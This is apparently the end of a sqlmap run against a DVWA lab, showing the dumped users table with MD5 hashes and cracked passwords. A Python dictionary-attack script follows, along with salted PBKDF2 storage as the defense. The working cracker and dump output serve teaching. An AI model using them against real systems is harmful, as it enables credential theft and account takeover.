[09:43:02] [INFO] using suffix '16'
[09:43:13] [INFO] using suffix '6'
[09:43:23] [INFO] using suffix '18'
[09:43:33] [INFO] using suffix '!'
[09:43:43] [INFO] using suffix '.'
[09:43:52] [INFO] using suffix '*'
[09:44:03] [INFO] using suffix '!!'
[09:44:12] [INFO] using suffix '?'
[09:44:22] [INFO] using suffix ';'
[09:44:32] [INFO] using suffix '..'
[09:44:42] [INFO] using suffix '!!!'
[09:45:02] [INFO] using suffix ', '
[09:46:38] [INFO] using suffix '@'
Database: dvwa
Table: users
[5 entries]
+---------+---------------------------------------------+
| user    | password                                    |
+---------+---------------------------------------------+
| admin   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)   |
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------------------------------------+

[09:46:49] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149\dump\dvwa\users.csv'
[09:46:49] [INFO] fetched data logged to text files under 'C:\Users\98377\AppData\Local\sqlmap\output\192.168.232.149'
[09:46:49] [WARNING] your sqlmap version is outdated

[*] ending @ 09:46:49 /2022-05-26/
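
The cracking stage of the run above, as an added example that is not code from the lab or from sqlmap: a dictionary attack with the same suffix rule against the five hashes sqlmap dumped, beside the per-user salted, deliberately slow derivation the application should have stored instead. The wordlist is a constructed miniature of sqlmap's data/txt/wordlist.txt; pbkdf2_store and pbkdf2_verify are illustrative names, not an API of any tool on this page.

```python
import hashlib
import hmac
import os

# The hashes sqlmap pulled out of dvwa.users above.
DUMPED = {
    "admin":   "5f4dcc3b5aa765d61d8327deb882cf99",
    "gordonb": "e99a18c428cb38d5f260853678922e03",
    "1337":    "8d3533d75ae2c3966d7e0d4fcc69216b",
    "pablo":   "0d107d09f5bbe40cade3de5c71e9e9b7",
    "smithy":  "5f4dcc3b5aa765d61d8327deb882cf99",
}

# Constructed miniature of sqlmap's wordlist.txt (the real file is far larger;
# only the words this demo needs are here).
WORDLIST = ["123456", "password", "qwerty", "abc", "letmein", "charley", "dragon", "root"]

# The first few of the "common password suffixes" sqlmap tried in the run above.
SUFFIXES = ["", "1", "123", "2", "12", "3", "!", "."]


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def crack_md5(hashes, wordlist, suffixes):
    """Dictionary attack on unsalted MD5. Every candidate is hashed exactly once
    and looked up against all targets at the same time: without a salt, users
    who share a password (admin and smithy) fall together, and attacking N
    users costs the same as attacking one."""
    targets = {}                        # hash -> users that have it
    for user, digest in hashes.items():
        targets.setdefault(digest.lower(), []).append(user)
    found = {}
    for word in wordlist:
        for suffix in suffixes:         # sqlmap's suffix rule: word, word1, word123, ...
            candidate = word + suffix
            for user in targets.pop(md5_hex(candidate), []):
                found[user] = candidate
            if not targets:
                return found
    return found


def pbkdf2_store(password, iterations=600_000):
    """What the application should have stored: a per-user random salt and a
    slow derivation, so each user needs a separate guessing run and each guess
    costs ~600k SHA-256 rounds instead of one MD5. (Illustrative helper.)"""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(stored, password):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for user, pw in crack_md5(DUMPED, WORDLIST, SUFFIXES).items():
        print(f"{user:8} {DUMPED[user]} ({pw})")
    record = pbkdf2_store("password")
    print("pbkdf2 record  :", record)
    print("verify password:", pbkdf2_verify(record, "password"))
```

The attack is cheap for two reasons the run above makes visible: MD5 is fast (sqlmap started 16 processes and worked through the whole suffix list in a few minutes), and the hashes are unsalted, so admin and smithy, who chose the same password, were cracked by one lookup. A per-user salt removes the second advantage and a slow KDF removes the first.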
